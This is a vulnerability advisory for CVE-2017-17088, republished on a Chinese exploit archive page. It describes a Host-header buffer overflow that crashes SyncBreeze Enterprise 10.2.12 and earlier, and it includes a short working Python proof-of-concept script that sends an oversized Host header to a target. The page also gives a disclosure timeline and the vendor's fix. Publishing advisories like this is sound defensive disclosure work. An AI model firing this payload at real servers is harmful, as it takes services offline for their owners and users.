首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sync Breeze 10.2.12 - Denial of Service
来源:vfocus.net 作者:Cardenas 发布时间:2017-12-18  
=============================================
MGC ALERT 2017-007
- Original release date: November 30, 2017
- Last revised:  December 14, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2017-17088
=============================================
 
I. VULNERABILITY
-------------------------
SyncBreeze <= 10.2.12 - Denial of Service
 
II. BACKGROUND
-------------------------
SyncBreeze is a fast, powerful and reliable file synchronization solution
for local disks, network shares, NAS storage devices and enterprise storage
systems.
 
III. DESCRIPTION
-------------------------
The Enterprise version of SyncBreeze is affected by a Remote Denial of
Service vulnerability.
 
The web server does not check bounds when reading server request in the
Host header on making a connection, resulting in a classic Buffer Overflow
that causes a Denial of Service.
 
To exploit the vulnerability only is needed use the version 1.1 of the HTTP
protocol to interact with the application.
 
IV. PROOF OF CONCEPT
-------------------------
#!/usr/bin/python
import sys, socket
 
host = sys.argv[1]
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: "+"A"*2000+"\r\n\r\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
s.send(buffer)
s.close()
 
V. BUSINESS IMPACT
-------------------------
Availability compromise can result from these attacks.
 
VI. SYSTEMS AFFECTED
-------------------------
SyncBreeze <= 10.2.12
 
VII. SOLUTION
-------------------------
Vendor release 10.3 version
http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe
 
VIII. REFERENCES
-------------------------
http://www.syncbreeze.com/
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
November 30, 2017 1: Initial release
December 14, 2017 2: Revision to send to lists
 
XI. DISCLOSURE TIMELINE
-------------------------
November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
November 30, 2017 2: Send to vendor
December 6,  2017 3: Vendor fix the vulnerability and release a new version
December 14, 2017 4: Send to the Full-Disclosure lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ITGuard-Manager 0.0.0.1 - Remo
·Linux kernel < 4.10.15 - Race
·Western Digital MyCloud multi_
·CDex 1.96 - Buffer Overflow
·Microsoft Office DDE Payload D
·Outlook for Android - Attachme
·Dup Scout Enterprise 10.0.18 B
·GoAhead httpd 2.5 < 3.6.5 - 'L
·Advantech WebAccess 8.2 Stack
·Linksys WVBR0 - 'User-Agent' R
·pfSense 2.4.1 CSRF Error Page
·WIndows jscript!JsArraySlice U
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved